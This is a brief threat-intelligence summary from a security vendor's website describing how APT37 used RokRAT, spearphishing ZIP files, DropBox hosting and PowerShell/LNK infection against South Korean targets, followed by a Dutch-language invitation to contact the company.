Cert2Connect

APT37 Utilizes RokRAT In Fileless Attacks

APT37 also known as Konni Thallium and InkySquid was discovered targeting entities in South Korea with the RokRAT cloud-based remote access tool. Initial access was carried out through spearphishing emails with a malicious ZIP file disguised as belonging to a North Korea-related research field. The threat actor leveraged DropBox cloud storage to host the malicious files. Multiple PowerShell commands along with LNK files were used to carry out the infection process. RokRAT has been leveraged by APT37 since at least 2017 and can be used to collect and exfiltrate sensitive information and download additional malicious files to infected systems.
Overzicht

WILT U WETEN HOE DIT RISICO
UITGEBANNEN KAN WORDEN?

Wij helpen je graag. Indien gewenst geven we graag een presentatie of demo van onze oplossingsaanpak. Je vindt ons ook regelmatig op beurzen en events. Volg de evenementenpagina op deze site of meld je aan via de contactpagina voor onze nieuwsbrief.

Maak een afspraak